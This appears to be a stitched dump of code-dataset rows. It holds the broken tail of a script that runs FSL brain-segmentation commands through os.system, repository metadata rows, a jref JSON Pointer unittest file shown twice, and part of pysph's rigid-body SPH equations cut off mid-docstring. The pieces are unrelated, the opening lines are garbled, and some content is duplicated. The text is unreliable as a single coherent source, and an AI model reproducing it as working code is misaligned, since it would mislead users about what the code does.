cmd = cmd.replace(os.sep,'/')
os.system(cmd)
3 -H 0.1 -I 4 -l 10.0 -o'
cmd = 'bash -lc "fast {0} {1} {2}"'.format(options, out_brain, out_brain)
cmd = cmd.replace(os.sep,'/')
os.system(cmd)
print('Finished file prep for ' +subj_name[:-1])
| true | true |
f72ee19e4a5aeceed8da6d03d596230a32b33ef5 | 7,332 | py | Python | jref/test/test_pointer.py | biochimia/python-json-reference | f7c54a7e9b92a12e781d6d8b5f6762e0113337c7 | [
"Apache-2.0"
] | null | null | null | jref/test/test_pointer.py | biochimia/python-json-reference | f7c54a7e9b92a12e781d6d8b5f6762e0113337c7 | [
"Apache-2.0"
] | 1 | 2021-05-28T13:39:14.000Z | 2021-05-28T13:39:14.000Z | jref/test/test_pointer.py | biochimia/python-jref | f7c54a7e9b92a12e781d6d8b5f6762e0113337c7 | [
"Apache-2.0"
] | null | null | null | import unittest
import jref.pointer as error
from jref.pointer import Pointer
class TestPointer(unittest.TestCase):
    """Exercise jref Pointer resolution (JSON-Pointer-style paths).

    A fresh ``object()`` sentinel is used per test so assertions prove the
    exact stored value is returned, not a copy or an equal value.
    """

    def setUp(self):
        self.sentinel = object()

    def check_pointer_is_sentinel(self, pointer, document):
        # Convenience wrapper for the common "resolves to the sentinel" case.
        self.check_pointer_equal(document, pointer, self.sentinel)

    def check_pointer_equal(self, document, pointer, value):
        self.assertEqual(Pointer.resolve_in(pointer, document), value)
        # test that starting slash in non-empty pointer is optional
        if (len(pointer) > 1
                and pointer[0] == '/'):
            self.assertEqual(Pointer.resolve_in(pointer[1:], document), value)

    def test_pointer_resolve_in_can_be_called_as_an_instance_method(self):
        self.assertEqual(
            Pointer('key').resolve_in({'key': self.sentinel}), self.sentinel)
        self.assertEqual(
            Pointer('key').resolve_in(document={'key': self.sentinel}),
            self.sentinel)

    def test_pointer_resolve_in_can_be_called_as_a_static_method(self):
        self.assertEqual(
            Pointer.resolve_in('key', {'key': self.sentinel}), self.sentinel)
        self.assertEqual(
            Pointer.resolve_in('key', document={'key': self.sentinel}),
            self.sentinel)

    def test_an_empty_pointer_resolves_to_the_document(self):
        self.check_pointer_is_sentinel('', document=self.sentinel)

    def test_empty_root_resolves_to_empty_key(self):
        # '/' references the member whose key is the empty string.
        self.check_pointer_is_sentinel('/', document={'': self.sentinel})

    def test_it_can_access_a_map_item_by_key(self):
        doc = { 'key': self.sentinel }
        self.check_pointer_is_sentinel('/key', doc)

    def test_it_can_access_nested_map_items_by_key(self):
        doc = { 'nested': { 'key': self.sentinel } }
        self.check_pointer_is_sentinel('/nested/key', doc)

    def test_it_can_access_array_element_by_index(self):
        doc = [ 1, 2, self.sentinel, 4, 5 ]
        self.check_pointer_is_sentinel('/2', doc)

    def test_it_handles_complex_nesting(self):
        doc1 = {
            'a': [
                1, 2, {
                    'c': [ 3, 4 ],
                    'd': 5,
                },
            ],
            'b': {
                'f': [ 6, 7, 8 ],
            },
        }
        self.check_pointer_equal(doc1, '/a/0', 1)
        self.check_pointer_equal(doc1, '/a/1', 2)
        self.check_pointer_equal(doc1, '/a/2/c/0', 3)
        self.check_pointer_equal(doc1, '/a/2/c/1', 4)
        self.check_pointer_equal(doc1, '/a/2/d', 5)
        self.check_pointer_equal(doc1, '/b/f/0', 6)
        self.check_pointer_equal(doc1, '/b/f/1', 7)
        self.check_pointer_equal(doc1, '/b/f/2', 8)
        doc2 = [
            1, 2, {
                'a': 3,
                'b': {
                    'c': 4,
                    'd': [ 5 ],
                },
            },
        ]
        self.check_pointer_equal(doc2, '/0', 1)
        self.check_pointer_equal(doc2, '/1', 2)
        self.check_pointer_equal(doc2, '/2/a', 3)
        self.check_pointer_equal(doc2, '/2/b/c', 4)
        self.check_pointer_equal(doc2, '/2/b/d/0', 5)

    def test_it_supports_numerical_keys(self):
        # Digit-only tokens still address map keys when the node is a dict.
        self.check_pointer_is_sentinel('/0', document={'0': self.sentinel})
        self.check_pointer_is_sentinel('/1', document={'1': self.sentinel})
        self.check_pointer_is_sentinel('/999', document={'999': self.sentinel})

    def test_it_supports_dash_as_a_map_key(self):
        self.check_pointer_is_sentinel('/-', document={'-': self.sentinel})

    def test_it_raises_an_error_for_dash_as_an_array_index(self):
        # '-' (the JSON Pointer "past-the-end" index) is not supported.
        with self.assertRaises(error.DashArrayIndexNotSupported):
            Pointer.resolve_in('/-', document=[])
        with self.assertRaises(error.DashArrayIndexNotSupported):
            Pointer.resolve_in('-', document=[])

    def test_it_raises_an_error_for_array_index_out_of_range(self):
        with self.assertRaises(error.IndexOutOfRange):
            Pointer.resolve_in('/5', document=[])
        with self.assertRaises(error.IndexOutOfRange):
            Pointer.resolve_in('5', document=[])

    def test_it_raises_an_error_for_non_numeric_array_index(self):
        with self.assertRaises(error.InvalidArrayIndex):
            Pointer.resolve_in('/key', document=[])
        with self.assertRaises(error.InvalidArrayIndex):
            Pointer.resolve_in('key', document=[])

    def test_it_raises_an_error_if_key_not_in_document(self):
        with self.assertRaises(error.MemberNotDefined):
            Pointer.resolve_in('/key', document={})
        with self.assertRaises(error.MemberNotDefined):
            Pointer.resolve_in('key', document={})

    def test_it_recognizes_tilde_escapes(self):
        # '~0' decodes to '~' and '~1' decodes to '/'.
        doc = {
            'a~b': 1,
            'ab~': 2,
            '~ab': 3,
            'a/b': 4,
            'ab/': 5,
            '/ab': 6,
            '~/~': 7,
            '/~/': 8,
            '~0': 9,
            '~1': 10,
        }
        self.check_pointer_equal(doc, '/a~0b', 1)
        self.check_pointer_equal(doc, '/ab~0', 2)
        self.check_pointer_equal(doc, '/~0ab', 3)
        self.check_pointer_equal(doc, '/a~1b', 4)
        self.check_pointer_equal(doc, '/ab~1', 5)
        self.check_pointer_equal(doc, '/~1ab', 6)
        self.check_pointer_equal(doc, '/~0~1~0', 7)
        self.check_pointer_equal(doc, '/~1~0~1', 8)
        self.check_pointer_equal(doc, '/~00', 9)
        self.check_pointer_equal(doc, '/~01', 10)

    def test_it_raises_an_error_on_unrecognized_escape_sequences(self):
        with self.assertRaises(error.UnrecognizedEscapeSequence):
            Pointer.resolve_in('/~2', document={})
        with self.assertRaises(error.UnrecognizedEscapeSequence):
            Pointer.resolve_in('~2', document={})

    def test_it_raises_an_error_on_unescaped_tilde(self):
        with self.assertRaises(error.UnescapedTilde):
            Pointer.resolve_in('/~', document={})
        with self.assertRaises(error.UnescapedTilde):
            Pointer.resolve_in('~', document={})

    def test_it_raises_an_error_if_unable_to_resolve_token(self):
        with self.assertRaises(error.UnreferenceableValue):
            Pointer.resolve_in('/key', document=object())
        with self.assertRaises(error.UnreferenceableValue):
            Pointer.resolve_in('key', document=object())

    def test_it_offers_support_for_lazy_loaded_values(self):
        # Values exposing __lazy_eval__ are materialized before resolution.
        class LazyValue:
            def __lazy_eval__(self):
                return {'a': 1, 'b': 2, 'c': 3}
        value = LazyValue()
        self.assertEqual(Pointer.resolve_in('/a', value), 1)
        self.assertEqual(Pointer.resolve_in('/b', value), 2)
        self.assertEqual(Pointer.resolve_in('/c', value), 3)

    def test_it_offers_support_for_recursive_lazy_loaded_values(self):
        class LazyValue:
            def __lazy_eval__(self):
                return {'a': 1, 'b': 2, 'c': 3}
        class EvenLazierValue:
            def __lazy_eval__(self):
                return LazyValue()
        value = EvenLazierValue()
        self.assertEqual(Pointer.resolve_in('/a', value), 1)
        self.assertEqual(Pointer.resolve_in('/b', value), 2)
        self.assertEqual(Pointer.resolve_in('/c', value), 3)
| 37.6 | 79 | 0.598882 | import unittest
import jref.pointer as error
from jref.pointer import Pointer
class TestPointer(unittest.TestCase):
def setUp(self):
self.sentinel = object()
def check_pointer_is_sentinel(self, pointer, document):
self.check_pointer_equal(document, pointer, self.sentinel)
def check_pointer_equal(self, document, pointer, value):
self.assertEqual(Pointer.resolve_in(pointer, document), value)
if (len(pointer) > 1
and pointer[0] == '/'):
self.assertEqual(Pointer.resolve_in(pointer[1:], document), value)
def test_pointer_resolve_in_can_be_called_as_an_instance_method(self):
self.assertEqual(
Pointer('key').resolve_in({'key': self.sentinel}), self.sentinel)
self.assertEqual(
Pointer('key').resolve_in(document={'key': self.sentinel}),
self.sentinel)
def test_pointer_resolve_in_can_be_called_as_a_static_method(self):
self.assertEqual(
Pointer.resolve_in('key', {'key': self.sentinel}), self.sentinel)
self.assertEqual(
Pointer.resolve_in('key', document={'key': self.sentinel}),
self.sentinel)
def test_an_empty_pointer_resolves_to_the_document(self):
self.check_pointer_is_sentinel('', document=self.sentinel)
def test_empty_root_resolves_to_empty_key(self):
self.check_pointer_is_sentinel('/', document={'': self.sentinel})
def test_it_can_access_a_map_item_by_key(self):
doc = { 'key': self.sentinel }
self.check_pointer_is_sentinel('/key', doc)
def test_it_can_access_nested_map_items_by_key(self):
doc = { 'nested': { 'key': self.sentinel } }
self.check_pointer_is_sentinel('/nested/key', doc)
def test_it_can_access_array_element_by_index(self):
doc = [ 1, 2, self.sentinel, 4, 5 ]
self.check_pointer_is_sentinel('/2', doc)
def test_it_handles_complex_nesting(self):
doc1 = {
'a': [
1, 2, {
'c': [ 3, 4 ],
'd': 5,
},
],
'b': {
'f': [ 6, 7, 8 ],
},
}
self.check_pointer_equal(doc1, '/a/0', 1)
self.check_pointer_equal(doc1, '/a/1', 2)
self.check_pointer_equal(doc1, '/a/2/c/0', 3)
self.check_pointer_equal(doc1, '/a/2/c/1', 4)
self.check_pointer_equal(doc1, '/a/2/d', 5)
self.check_pointer_equal(doc1, '/b/f/0', 6)
self.check_pointer_equal(doc1, '/b/f/1', 7)
self.check_pointer_equal(doc1, '/b/f/2', 8)
doc2 = [
1, 2, {
'a': 3,
'b': {
'c': 4,
'd': [ 5 ],
},
},
]
self.check_pointer_equal(doc2, '/0', 1)
self.check_pointer_equal(doc2, '/1', 2)
self.check_pointer_equal(doc2, '/2/a', 3)
self.check_pointer_equal(doc2, '/2/b/c', 4)
self.check_pointer_equal(doc2, '/2/b/d/0', 5)
def test_it_supports_numerical_keys(self):
self.check_pointer_is_sentinel('/0', document={'0': self.sentinel})
self.check_pointer_is_sentinel('/1', document={'1': self.sentinel})
self.check_pointer_is_sentinel('/999', document={'999': self.sentinel})
def test_it_supports_dash_as_a_map_key(self):
self.check_pointer_is_sentinel('/-', document={'-': self.sentinel})
def test_it_raises_an_error_for_dash_as_an_array_index(self):
with self.assertRaises(error.DashArrayIndexNotSupported):
Pointer.resolve_in('/-', document=[])
with self.assertRaises(error.DashArrayIndexNotSupported):
Pointer.resolve_in('-', document=[])
def test_it_raises_an_error_for_array_index_out_of_range(self):
with self.assertRaises(error.IndexOutOfRange):
Pointer.resolve_in('/5', document=[])
with self.assertRaises(error.IndexOutOfRange):
Pointer.resolve_in('5', document=[])
def test_it_raises_an_error_for_non_numeric_array_index(self):
with self.assertRaises(error.InvalidArrayIndex):
Pointer.resolve_in('/key', document=[])
with self.assertRaises(error.InvalidArrayIndex):
Pointer.resolve_in('key', document=[])
def test_it_raises_an_error_if_key_not_in_document(self):
with self.assertRaises(error.MemberNotDefined):
Pointer.resolve_in('/key', document={})
with self.assertRaises(error.MemberNotDefined):
Pointer.resolve_in('key', document={})
def test_it_recognizes_tilde_escapes(self):
doc = {
'a~b': 1,
'ab~': 2,
'~ab': 3,
'a/b': 4,
'ab/': 5,
'/ab': 6,
'~/~': 7,
'/~/': 8,
'~0': 9,
'~1': 10,
}
self.check_pointer_equal(doc, '/a~0b', 1)
self.check_pointer_equal(doc, '/ab~0', 2)
self.check_pointer_equal(doc, '/~0ab', 3)
self.check_pointer_equal(doc, '/a~1b', 4)
self.check_pointer_equal(doc, '/ab~1', 5)
self.check_pointer_equal(doc, '/~1ab', 6)
self.check_pointer_equal(doc, '/~0~1~0', 7)
self.check_pointer_equal(doc, '/~1~0~1', 8)
self.check_pointer_equal(doc, '/~00', 9)
self.check_pointer_equal(doc, '/~01', 10)
def test_it_raises_an_error_on_unrecognized_escape_sequences(self):
with self.assertRaises(error.UnrecognizedEscapeSequence):
Pointer.resolve_in('/~2', document={})
with self.assertRaises(error.UnrecognizedEscapeSequence):
Pointer.resolve_in('~2', document={})
def test_it_raises_an_error_on_unescaped_tilde(self):
with self.assertRaises(error.UnescapedTilde):
Pointer.resolve_in('/~', document={})
with self.assertRaises(error.UnescapedTilde):
Pointer.resolve_in('~', document={})
def test_it_raises_an_error_if_unable_to_resolve_token(self):
with self.assertRaises(error.UnreferenceableValue):
Pointer.resolve_in('/key', document=object())
with self.assertRaises(error.UnreferenceableValue):
Pointer.resolve_in('key', document=object())
def test_it_offers_support_for_lazy_loaded_values(self):
class LazyValue:
def __lazy_eval__(self):
return {'a': 1, 'b': 2, 'c': 3}
value = LazyValue()
self.assertEqual(Pointer.resolve_in('/a', value), 1)
self.assertEqual(Pointer.resolve_in('/b', value), 2)
self.assertEqual(Pointer.resolve_in('/c', value), 3)
def test_it_offers_support_for_recursive_lazy_loaded_values(self):
class LazyValue:
def __lazy_eval__(self):
return {'a': 1, 'b': 2, 'c': 3}
class EvenLazierValue:
def __lazy_eval__(self):
return LazyValue()
value = EvenLazierValue()
self.assertEqual(Pointer.resolve_in('/a', value), 1)
self.assertEqual(Pointer.resolve_in('/b', value), 2)
self.assertEqual(Pointer.resolve_in('/c', value), 3)
| true | true |
f72ee435673a5217151a45861e9d332977bb5797 | 26,728 | py | Python | pysph/sph/rigid_body.py | rahulgovind/pysph | 3d493e6f2c5284ea9c0f0d008e4eb9a0870da0d9 | [
"BSD-3-Clause"
] | 1 | 2019-03-11T12:42:56.000Z | 2019-03-11T12:42:56.000Z | pysph/sph/rigid_body.py | rahulgovind/pysph | 3d493e6f2c5284ea9c0f0d008e4eb9a0870da0d9 | [
"BSD-3-Clause"
] | 1 | 2018-11-17T15:39:11.000Z | 2018-11-17T15:39:11.000Z | pysph/sph/rigid_body.py | rahulgovind/pysph | 3d493e6f2c5284ea9c0f0d008e4eb9a0870da0d9 | [
"BSD-3-Clause"
] | null | null | null | # -*- coding: utf-8 -*-
"""Rigid body related equations.
"""
from pysph.base.reduce_array import parallel_reduce_array
from pysph.sph.equation import Equation
from pysph.sph.integrator_step import IntegratorStep
import numpy as np
import numpy
from math import sqrt
def skew(vec):
    """Return the 3x3 skew-symmetric (cross-product) matrix of ``vec``.

    The returned sympy Matrix S satisfies S*w == vec x w.
    """
    import sympy as S
    vx, vy, vz = vec[0], vec[1], vec[2]
    return S.Matrix([
        [0, -vz, vy],
        [vz, 0, -vx],
        [-vy, vx, 0],
    ])
def get_alpha_dot():
    r"""Use sympy to perform most of the math and use the resulting formulae
    to calculate:

        inv(I) (\tau - w x (I w))

    This is a code-generation helper: it prints the common subexpressions
    (tmp*) and the three components of the angular acceleration, ready to be
    pasted into the rigid-body equations. (Raw docstring so ``\t`` is not a
    tab escape.)
    """
    import sympy as S
    # Symmetric inertia tensor entries, torque and angular velocity symbols.
    ixx, iyy, izz, ixy, ixz, iyz = S.symbols("ixx, iyy, izz, ixy, ixz, iyz")
    tx, ty, tz = S.symbols("tx, ty, tz")
    wx, wy, wz = S.symbols('wx, wy, wz')
    tau = S.Matrix([tx, ty, tz])
    I = S.Matrix([[ixx, ixy, ixz], [ixy, iyy, iyz], [ixz, iyz, izz]])
    w = S.Matrix([wx, wy, wz])
    Iinv = I.inv()
    Iinv.simplify()
    # inv(I) (\tau - w x (Iw))
    res = Iinv*(tau - w.cross(I*w))
    res.simplify()
    # Common-subexpression elimination keeps the generated code compact.
    syms, result = S.cse(res, symbols=S.numbered_symbols('tmp'))
    for lhs, rhs in syms:
        print("%s = %s" % (lhs, rhs))
    for i in range(3):
        print("omega_dot[%d] =" % i, result[0][i])
def get_torque():
    """Use sympy to perform some simple math.

        R x F
        C_m x F
        w x r

    Code-generation helper: prints the symbolic cross products used in the
    rigid-body force/torque equations.
    """
    import sympy as S
    x, y, z, fx, fy, fz = S.symbols("x, y, z, fx, fy, fz")
    R = S.Matrix([x, y, z])
    F = S.Matrix([fx, fy, fz])
    # Torque of force F applied at position R.
    print("Torque:", R.cross(F))
    cx, cy, cz = S.symbols('cx, cy, cz')
    d = S.Matrix([cx, cy, cz])
    print("c_m x f = ", d.cross(F))
    wx, wy, wz = S.symbols('wx, wy, wz')
    rx, ry, rz = S.symbols('rx, ry, rz')
    w = S.Matrix([wx, wy, wz])
    r = S.Matrix([rx, ry, rz])
    # Velocity of a point at r due to angular velocity w.
    print("w x r = %s" % w.cross(r))
def declare(*args):
    """No-op stand-in that silences editor warnings for ``declare`` usage.

    At plain-Python runtime it does nothing and returns None; the arguments
    are presumably interpreted elsewhere by PySPH's code transformation —
    confirm in the PySPH transpiler.
    """
    return None
class RigidBodyMoments(Equation):
    """Reduce per-particle data into per-body rigid-body properties.

    For each body this computes the total mass, center of mass, moment of
    inertia tensor about the center of mass, net force, net torque about
    the center of mass, center-of-mass acceleration and the angular
    acceleration ``omega_dot = inv(I) (tau - w x (I w))``.

    The scratch array ``dst.mi`` holds 16 slots per body: it is first used
    for the cross-processor reduction and then overwritten with the full
    3x3 inertia tensor (slots 0-8).
    """
    def reduce(self, dst, t, dt):
        # FIXME: this will be slow in opencl
        nbody = declare('int')
        i = declare('int')
        base_mi = declare('int')
        base = declare('int')
        nbody = dst.num_body[0]
        if dst.gpu:
            # Bring the needed arrays to the host for the numpy reduction.
            dst.gpu.pull('omega', 'x', 'y', 'z', 'fx', 'fy', 'fz')
        d_mi = declare('object')
        m = declare('object')
        x = declare('object')
        y = declare('object')
        z = declare('object')
        fx = declare('object')
        fy = declare('object')
        fz = declare('object')
        d_mi = dst.mi
        cond = declare('object')
        for i in range(nbody):
            # Boolean mask selecting the particles of body ``i``.
            cond = dst.body_id == i
            base = i*16
            m = dst.m[cond]
            x = dst.x[cond]
            y = dst.y[cond]
            z = dst.z[cond]
            # Find the total_mass, center of mass and second moments.
            d_mi[base + 0] = numpy.sum(m)
            d_mi[base + 1] = numpy.sum(m*x)
            d_mi[base + 2] = numpy.sum(m*y)
            d_mi[base + 3] = numpy.sum(m*z)
            # Only do the lower triangle of values moments of inertia.
            d_mi[base + 4] = numpy.sum(m*(y*y + z*z))
            d_mi[base + 5] = numpy.sum(m*(x*x + z*z))
            d_mi[base + 6] = numpy.sum(m*(x*x + y*y))
            d_mi[base + 7] = -numpy.sum(m*x*y)
            d_mi[base + 8] = -numpy.sum(m*x*z)
            d_mi[base + 9] = -numpy.sum(m*y*z)
            # the total force and torque
            fx = dst.fx[cond]
            fy = dst.fy[cond]
            fz = dst.fz[cond]
            d_mi[base + 10] = numpy.sum(fx)
            d_mi[base + 11] = numpy.sum(fy)
            d_mi[base + 12] = numpy.sum(fz)
            # Calculate the torque and reduce it.
            d_mi[base + 13] = numpy.sum(y*fz - z*fy)
            d_mi[base + 14] = numpy.sum(z*fx - x*fz)
            d_mi[base + 15] = numpy.sum(x*fy - y*fx)
        # Reduce the temporary mi values in parallel across processors.
        d_mi[:] = parallel_reduce_array(dst.mi)
        # Set the reduced values.
        for i in range(nbody):
            base_mi = i*16
            base = i*3
            m = d_mi[base_mi + 0]
            dst.total_mass[i] = m
            cx = d_mi[base_mi + 1]/m
            cy = d_mi[base_mi + 2]/m
            cz = d_mi[base_mi + 3]/m
            dst.cm[base + 0] = cx
            dst.cm[base + 1] = cy
            dst.cm[base + 2] = cz
            # The actual moment of inertia about center of mass from parallel
            # axes theorem.
            ixx = d_mi[base_mi + 4] - (cy*cy + cz*cz)*m
            iyy = d_mi[base_mi + 5] - (cx*cx + cz*cz)*m
            izz = d_mi[base_mi + 6] - (cx*cx + cy*cy)*m
            ixy = d_mi[base_mi + 7] + cx*cy*m
            ixz = d_mi[base_mi + 8] + cx*cz*m
            iyz = d_mi[base_mi + 9] + cy*cz*m
            # Overwrite the scratch slots with the full symmetric tensor.
            d_mi[base_mi + 0] = ixx
            d_mi[base_mi + 1] = ixy
            d_mi[base_mi + 2] = ixz
            d_mi[base_mi + 3] = ixy
            d_mi[base_mi + 4] = iyy
            d_mi[base_mi + 5] = iyz
            d_mi[base_mi + 6] = ixz
            d_mi[base_mi + 7] = iyz
            d_mi[base_mi + 8] = izz
            fx = d_mi[base_mi + 10]
            fy = d_mi[base_mi + 11]
            fz = d_mi[base_mi + 12]
            dst.force[base + 0] = fx
            dst.force[base + 1] = fy
            dst.force[base + 2] = fz
            # Acceleration of CM.
            dst.ac[base + 0] = fx/m
            dst.ac[base + 1] = fy/m
            dst.ac[base + 2] = fz/m
            # Find torque about the Center of Mass and not origin.
            tx = d_mi[base_mi + 13]
            ty = d_mi[base_mi + 14]
            tz = d_mi[base_mi + 15]
            tx -= cy*fz - cz*fy
            ty -= -cx*fz + cz*fx
            tz -= cx*fy - cy*fx
            dst.torque[base + 0] = tx
            dst.torque[base + 1] = ty
            dst.torque[base + 2] = tz
            wx = dst.omega[base + 0]
            wy = dst.omega[base + 1]
            wz = dst.omega[base + 2]
            # Find omega_dot from: omega_dot = inv(I) (\tau - w x (Iw))
            # This was done using the sympy code above (see get_alpha_dot).
            tmp0 = iyz**2
            tmp1 = ixy**2
            tmp2 = ixz**2
            tmp3 = ixx*iyy
            tmp4 = ixy*ixz
            tmp5 = 1./(ixx*tmp0 + iyy*tmp2 - 2*iyz*tmp4 + izz*tmp1 - izz*tmp3)
            tmp6 = ixy*izz - ixz*iyz
            tmp7 = ixz*wx + iyz*wy + izz*wz
            tmp8 = ixx*wx + ixy*wy + ixz*wz
            tmp9 = tmp7*wx - tmp8*wz + ty
            tmp10 = ixy*iyz - ixz*iyy
            tmp11 = ixy*wx + iyy*wy + iyz*wz
            tmp12 = -tmp11*wx + tmp8*wy + tz
            tmp13 = tmp11*wz - tmp7*wy + tx
            tmp14 = ixx*iyz - tmp4
            dst.omega_dot[base + 0] = tmp5*(-tmp10*tmp12 -
                                            tmp13*(iyy*izz - tmp0) + tmp6*tmp9)
            dst.omega_dot[base + 1] = tmp5*(tmp12*tmp14 +
                                            tmp13*tmp6 - tmp9*(ixx*izz - tmp2))
            dst.omega_dot[base + 2] = tmp5*(-tmp10*tmp13 -
                                            tmp12*(-tmp1 + tmp3) + tmp14*tmp9)
        if dst.gpu:
            # Write the per-body results back to the device.
            dst.gpu.push(
                'total_mass', 'mi', 'cm', 'force', 'ac', 'torque',
                'omega_dot'
            )
class RigidBodyMotion(Equation):
    """Assign each particle the velocity of its rigid body.

    The particle velocity is the body's center-of-mass velocity plus the
    rotational contribution: ``v = v_c + omega x r`` where ``r`` is the
    particle position relative to the body's center of mass.
    """
    def initialize(self, d_idx, d_x, d_y, d_z, d_u, d_v, d_w,
                   d_cm, d_vc, d_ac, d_omega, d_body_id):
        base = declare('int')
        base = d_body_id[d_idx]*3
        # Angular velocity of this particle's body.
        ox = d_omega[base + 0]
        oy = d_omega[base + 1]
        oz = d_omega[base + 2]
        # Particle position relative to the body's center of mass.
        px = d_x[d_idx] - d_cm[base + 0]
        py = d_y[d_idx] - d_cm[base + 1]
        pz = d_z[d_idx] - d_cm[base + 2]
        # v = v_c + omega x r, written out component-wise.
        d_u[d_idx] = d_vc[base + 0] + oy*pz - oz*py
        d_v[d_idx] = d_vc[base + 1] + oz*px - ox*pz
        d_w[d_idx] = d_vc[base + 2] + ox*py - oy*px
class BodyForce(Equation):
    """Apply a constant body (gravity-like) force ``m*g`` to every
    particle of the destination array."""

    def __init__(self, dest, sources, gx=0.0, gy=0.0, gz=0.0):
        """
        Parameters
        ----------
        gx, gy, gz : float
            Components of the body acceleration.
        """
        self.gx = gx
        self.gy = gy
        self.gz = gz
        super(BodyForce, self).__init__(dest, sources)

    def initialize(self, d_idx, d_m, d_fx, d_fy, d_fz, d_num_body, d_mi):
        # Overwrite (not accumulate) the per-particle force with m*g.
        mass = d_m[d_idx]
        d_fx[d_idx] = mass*self.gx
        d_fy[d_idx] = mass*self.gy
        d_fz[d_idx] = mass*self.gz
class SummationDensityBoundary(Equation):
    r"""Accumulate the density contribution of a boundary or rigid body
    on a fluid particle:

    .. math:: \rho_a = \sum_b \rho_{fluid} V_b W_{ab}
    """

    def __init__(self, dest, sources, fluid_rho=1000.0):
        """
        Parameters
        ----------
        fluid_rho : float
            Reference density of the fluid phase.
        """
        self.fluid_rho = fluid_rho
        super(SummationDensityBoundary, self).__init__(dest, sources)

    def loop(self, d_idx, d_rho, s_idx, s_m, s_V, WIJ):
        # Each boundary neighbor contributes rho_fluid * V_b * W_ab.
        d_rho[d_idx] += self.fluid_rho * s_V[s_idx] * WIJ
class NumberDensity(Equation):
    """Accumulate the kernel summation ``V_a = sum_b W_ab`` (the number
    density, i.e. the inverse of the particle's effective volume)."""

    def initialize(self, d_idx, d_V):
        # Reset the accumulator before the neighbor loop.
        d_V[d_idx] = 0.0

    def loop(self, d_idx, d_V, WIJ):
        d_V[d_idx] += WIJ
class SummationDensityRigidBody(Equation):
    """Density of a particle from rigid-body neighbors via their number
    density: each neighbor contributes ``rho0 * W_ab / V_b``."""

    def __init__(self, dest, sources, rho0):
        """
        Parameters
        ----------
        rho0 : float
            Reference (rest) density of the fluid.
        """
        self.rho0 = rho0
        super(SummationDensityRigidBody, self).__init__(dest, sources)

    def initialize(self, d_idx, d_rho):
        # Start from zero; the neighbor loop accumulates the sum.
        d_rho[d_idx] = 0.0

    def loop(self, d_idx, d_rho, s_idx, s_V, WIJ):
        d_rho[d_idx] += self.rho0/s_V[s_idx]*WIJ
class ViscosityRigidBody(Equation):
    """Viscous acceleration on the fluid due to a rigid-body boundary,
    with the equal-and-opposite reaction accumulated on the body.

    Implemented from Akinci et al.
    http://dx.doi.org/10.1145/2185520.2185558

    Use this with the fluid as a destination and body as source.
    """

    def __init__(self, dest, sources, rho0, nu):
        """
        Parameters
        ----------
        rho0 : float
            Reference (rest) density of the fluid.
        nu : float
            Viscosity coefficient.
        """
        self.nu = nu
        self.rho0 = rho0
        super(ViscosityRigidBody, self).__init__(dest, sources)

    def loop(self, d_idx, d_m, d_au, d_av, d_aw, d_rho,
             s_idx, s_V, s_fx, s_fy, s_fz,
             EPS, VIJ, XIJ, R2IJ, DWIJ):
        phi_b = self.rho0/(s_V[s_idx]*d_rho[d_idx])
        # Clamp at zero so only approaching pairs (v.x < 0) contribute.
        vijdotxij = min(VIJ[0]*XIJ[0] + VIJ[1]*XIJ[1] + VIJ[2]*XIJ[2], 0.0)
        fac = self.nu*phi_b*vijdotxij/(R2IJ + EPS)
        acc_x = fac*DWIJ[0]
        acc_y = fac*DWIJ[1]
        acc_z = fac*DWIJ[2]
        # Acceleration on the fluid particle ...
        d_au[d_idx] += acc_x
        d_av[d_idx] += acc_y
        d_aw[d_idx] += acc_z
        # ... and the opposite reaction force on the body particle.
        s_fx[s_idx] -= d_m[d_idx]*acc_x
        s_fy[s_idx] -= d_m[d_idx]*acc_y
        s_fz[s_idx] -= d_m[d_idx]*acc_z
class PressureRigidBody(Equation):
    """Pressure acceleration on the fluid due to a rigid-body boundary,
    with the equal-and-opposite reaction accumulated on the body.

    Implemented from Akinci et al.
    http://dx.doi.org/10.1145/2185520.2185558

    Use this with the fluid as a destination and body as source.
    """

    def __init__(self, dest, sources, rho0):
        """
        Parameters
        ----------
        rho0 : float
            Reference (rest) density of the fluid.
        """
        self.rho0 = rho0
        super(PressureRigidBody, self).__init__(dest, sources)

    def loop(self, d_idx, d_m, d_rho, d_au, d_av, d_aw, d_p,
             s_idx, s_V, s_fx, s_fy, s_fz, DWIJ):
        rho1 = 1.0/d_rho[d_idx]
        # -p/rho^2 scaled by the boundary particle's pseudo-mass rho0/V_b.
        fac = -d_p[d_idx]*rho1*rho1*self.rho0/s_V[s_idx]
        acc_x = fac*DWIJ[0]
        acc_y = fac*DWIJ[1]
        acc_z = fac*DWIJ[2]
        # Acceleration on the fluid particle ...
        d_au[d_idx] += acc_x
        d_av[d_idx] += acc_y
        d_aw[d_idx] += acc_z
        # ... and the opposite reaction force on the body particle.
        s_fx[s_idx] -= d_m[d_idx]*acc_x
        s_fy[s_idx] -= d_m[d_idx]*acc_y
        s_fz[s_idx] -= d_m[d_idx]*acc_z
class AkinciRigidFluidCoupling(Equation):
    """Coupling force between a solid (rigid-body) particle and an SPH
    fluid particle, using Akinci's [1] formulation with the additional
    solid-pressure force of Liu [2].

    [1] 'Versatile Rigid-Fluid Coupling for Incompressible SPH'
        https://graphics.ethz.ch/~sobarbar/papers/Sol12/Sol12.pdf
    [2] 'A 3D Simulation of a Moving Solid in Viscous Free-Surface Flows
        by Coupling SPH and DEM', https://doi.org/10.1155/2017/3174904

    Note: the contributions to both phases are accumulated here in one
    pass, so make sure this equation is applied only once per pair.
    """

    def __init__(self, dest, sources, fluid_rho=1000):
        """
        Parameters
        ----------
        fluid_rho : float
            Reference density of the fluid phase.
        """
        super(AkinciRigidFluidCoupling, self).__init__(dest, sources)
        self.fluid_rho = fluid_rho

    def loop(self, d_idx, d_m, d_rho, d_au, d_av, d_aw, d_p,
             s_idx, s_V, s_fx, s_fy, s_fz, DWIJ, s_m, s_p, s_rho):
        # Pseudo-mass of the boundary particle from its volume.
        psi = s_V[s_idx] * self.fluid_rho
        # Pressure factor 2 p_a / rho_a^2.
        pfac = 2 * d_p[d_idx] / (d_rho[d_idx]**2)
        # Acceleration on the fluid particle.
        d_au[d_idx] -= psi * pfac * DWIJ[0]
        d_av[d_idx] -= psi * pfac * DWIJ[1]
        d_aw[d_idx] -= psi * pfac * DWIJ[2]
        # Equal and opposite force on the solid particle.
        s_fx[s_idx] += d_m[d_idx] * psi * pfac * DWIJ[0]
        s_fy[s_idx] += d_m[d_idx] * psi * pfac * DWIJ[1]
        s_fz[s_idx] += d_m[d_idx] * psi * pfac * DWIJ[2]
class LiuFluidForce(Equation):
    """Coupling force between a solid (rigid-body) particle and an SPH
    fluid particle, using Akinci's [1] force with the additional
    solid-pressure term of Liu [2].

